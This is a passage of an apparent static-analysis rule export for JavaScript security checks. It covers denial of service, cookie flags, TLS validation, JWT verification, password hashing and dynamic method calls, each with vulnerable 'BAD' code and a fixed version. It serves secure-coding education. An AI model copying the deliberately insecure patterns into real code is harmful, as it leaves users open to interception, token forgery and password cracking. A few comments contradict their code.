denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). 
This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n if (!isValidPath(rootDir, req.query.filePath)) {\n throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n }\n // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n if (err) {\n console.error(\n `Server setup is corrupted, ${rootDir} cannot be accessed!`\n );\n res.status(500);\n res.end();\n return;\n }\n save(rootDir, req.query.path, req.body);\n res.status(200);\n res.end();\n });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n // ...\n try {\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n try {\n await fs.promises.access(rootDir);\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-248", "external/cwe/cwe-730" ], + "description" : "A server that can be forced to crash may be vulnerable to denial-of-service\n attacks.", + 
"id" : "js/server-crash", + "kind" : "path-problem", + "name" : "Server crash", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/missing-rate-limiting", + "name" : "js/missing-rate-limiting", + "shortDescription" : { + "text" : "Missing rate limiting" + }, + "fullDescription" : { + "text" : "An HTTP request handler that performs expensive operations without restricting the rate at which operations can be carried out is vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n windowMs: 15 * 60 * 1000, // 15 minutes\n max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n 
let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n windowMs: 15 * 60 * 1000, // 15 minutes\n max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all 
requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-770", "external/cwe/cwe-307", "external/cwe/cwe-400" ], + "description" : "An HTTP request handler that performs expensive operations without\n restricting the rate at which operations can be carried out is vulnerable\n to denial-of-service attacks.", + "id" : "js/missing-rate-limiting", + "kind" : "problem", + "name" : "Missing rate limiting", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/resource-exhaustion", + "name" : "js/resource-exhaustion", + "shortDescription" : { + "text" : "Resource exhaustion" + }, + "fullDescription" : { + "text" : "Allocating objects or timers with user-controlled sizes or durations can cause resource exhaustion." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. 
It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. 
Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n", + "markdown" : "# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. 
It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. 
Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. 
A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-400", "external/cwe/cwe-770" ], + "description" : "Allocating objects or timers with user-controlled\n sizes or durations can cause resource exhaustion.", + "id" : "js/resource-exhaustion", + "kind" : "path-problem", + "name" : "Resource exhaustion", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/client-exposed-cookie", + "name" : "js/client-exposed-cookie", + "shortDescription" : { + "text" : "Sensitive server cookie exposed to the client" + }, + "fullDescription" : { + "text" : "Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n", + "markdown" : "# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1004" ], + "description" : "Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set.", + "id" : "js/client-exposed-cookie", + "kind" : "problem", + "name" : "Sensitive server cookie exposed to the client", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/disabling-certificate-validation", + "name" : "js/disabling-certificate-validation", + "shortDescription" : { + "text" : "Disabling certificate validation" + }, + "fullDescription" : { + "text" : "Disabling cryptographic certificate validation can cause security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. 
But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n {\n hostname: \"secure.my-online-bank.com\",\n port: 443,\n method: \"POST\",\n path: \"send-confidential-information\",\n rejectUnauthorized: false // BAD\n },\n response => {\n // ... communicate with secure.my-online-bank.com\n }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n", + "markdown" : "# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. 
But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n {\n hostname: \"secure.my-online-bank.com\",\n port: 443,\n method: \"POST\",\n path: \"send-confidential-information\",\n rejectUnauthorized: false // BAD\n },\n response => {\n // ... communicate with secure.my-online-bank.com\n }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-295", "external/cwe/cwe-297" ], + "description" : "Disabling cryptographic certificate validation can cause security vulnerabilities.", + "id" : "js/disabling-certificate-validation", + "kind" : "problem", + "name" : "Disabling certificate validation", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/jwt-missing-verification", + "name" : "js/jwt-missing-verification", + "shortDescription" : { + "text" : "JWT 
missing secret or public key verification" + }, + "fullDescription" : { + "text" : "The application does not verify the JWT payload with a cryptographic secret or public key." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n", + "markdown" : "# JWT missing secret or public key verification\nApplications decoding 
JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-347" ], + "description" : "The application does not verify the JWT payload with a cryptographic secret or public key.", + "id" : "js/jwt-missing-verification", + "kind" : "problem", + "name" : "JWT missing secret or public key verification", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.0" + } + }, { + "id" : 
"js/insufficient-password-hash", + "name" : "js/insufficient-password-hash", + "shortDescription" : { + "text" : "Use of password hash with insufficient computational effort" + }, + "fullDescription" : { + "text" : "Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n var hasher = crypto.createHash('md5');\n var hashed = hasher.update(password).digest(\"hex\"); // BAD\n return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. 
A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n var hashed = bcrypt.hashSync(password, salt); // GOOD\n return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n", + "markdown" : "# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n var hasher = crypto.createHash('md5');\n var hashed = hasher.update(password).digest(\"hex\"); // BAD\n return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. 
A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n var hashed = bcrypt.hashSync(password, salt); // GOOD\n return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-916" ], + "description" : "Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks.", + "id" : "js/insufficient-password-hash", + "kind" : "path-problem", + "name" : "Use of password hash with insufficient computational effort", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "8.1" + } + }, { + "id" : "js/unvalidated-dynamic-method-call", + "name" : "js/unvalidated-dynamic-method-call", + "shortDescription" : { + "text" : "Unvalidated dynamic method call" + }, + "fullDescription" : { + "text" : "Calling a method with a user-controlled name may dispatch to an unexpected target, which could cause an exception." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. 
In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n let action = actions[req.params.action];\n // BAD: `action` may not be a function\n res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. 
